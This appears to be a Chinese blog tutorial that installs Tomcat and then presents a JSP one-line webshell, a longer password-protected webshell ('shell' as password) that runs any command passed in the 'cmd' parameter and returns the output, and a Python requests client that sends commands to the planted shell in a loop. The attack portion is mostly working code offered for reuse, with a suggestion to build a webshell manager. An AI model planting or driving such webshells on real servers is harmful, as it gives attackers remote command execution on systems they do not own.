- 1每天一道大厂SQL题【Day30】腾讯QQ(一)创建表,并插入数据_编写一段sql,创建一个qq用户表
- 2Spark引擎架构图解_spark体系架构示意图
- 3开源照片管理服务LibrePhotos
- 4redis入门+springboot整合_springboot redis的mget mset
- 5mysql 触发器trigeer_mysql触发器(Trigger)简明总结和使用实例
- 6git 设置代理 取消代理_git config --global取消代理
- 7javascript和python的string的split方法_js实现python的split
- 82万字长文助你快速入门AIGC:包含基础知识、实用模型 、应用场景、热门工具…_aigc学习
- 9部署MariaDB数据库管理系统_mariadb部署
- 10Kafka笔记-搭建及单机生产者、消费者操作_kafka 生产者消费者在一个程序里启动
使用python连接JSP一句话木马_jsp一句话怎么连接
赞
踩
首先需要安装tomcat。
去官网 http://tomcat.apache.org/ 下载对应的 Linux 版本。
这里,我下载的是 apache-tomcat-8.5.70.tar.gz
最好提前安装好 JDK1.8 ,因为 kali 自带的那个可能会出现一点问题。
这是我遇到的问题,随手记录了一下。
https://blog.csdn.net/weixin_45254208/article/details/119897865
不过你也可以不重装,等出了问题再重装,万一你的电脑就没有我这种情况呢。
好了,回到 tomcat 的安装这个问题上来。
解压缩下载好的安装包。
tar -zxvf apache-tomcat-8.5.70.tar.gz
将解压后的目录,移动到 /usr/local/ 目录下。
然后,使用命令 vim /etc/profile 配置环境变量,权限不够就加 sudo 。
在文档最下方添加以下环境变量配置代码
export CATALINA_HOME=/usr/local/software/tomcat8.5.70
使用命令 source /etc/profile 让配置立即生效。
进入 tomcat 安装目录的 bin 目录,执行 ./startup.sh,看到如图提示代表启动成功。
接下来才是重点,前面那都是安装和配置环节。
tomcat 的跟目录在 /usr/local/apache-tomcat-8.5.70/webapps/ROOT ,在该路目中写一个 JSP 一句话木马,名为 shell.jsp ,如下图所示(我已提前写好)。
最简单的 JSP 一句话,其内容为:
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
- 1
不过,我用的是另外一个 webshell ,稍微长一点。
<%@ page language="java" contentType="text/html; charset=GBK" pageEncoding="UTF-8"%> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>一句话木马</title> </head> <body> <% if ("shell".equals(request.getParameter("pwd"))) { java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int len = -1; byte[] bytes = new byte[4092]; out.print("<pre>"); while ((len = input.read(bytes)) != -1) { out.println(new String(bytes, "GBK")); } out.print("</pre>"); } %> </body> </html>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
其中,shell 是连接密码,变量 cmd 用于接收参数。
在 Windows 本机验证一下。
但是,既然标题说的是用python连接,那我当然不能忘了。
其实代码十分简单,无非就是使用 python 的 requests 库,发送请求,传递参数,执行命令。
import requests url = str(input('目标URL:')) # http://192.168.223.130:8080/shell.jsp pwd = str(input('连接密码:')) # 其实就是一句话木马中的变量shell while(True): cmd = str(input('想要执行的命令:')) # 将命令传给 JSP 一句话木马 payload = { 'pwd': '{}'.format(pwd), 'cmd': '{}'.format(cmd) } # 向目标url发送post请求 response = requests.post(url=url, params=payload) # 回显命令执行的结果 print(response.text)
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
结果如下:
在此基础上,可以更加深入一点,最终开发出一个 webshell 的连接管理工具,也不是不可以。
如果本文对你有用的话,欢迎点赞收藏。
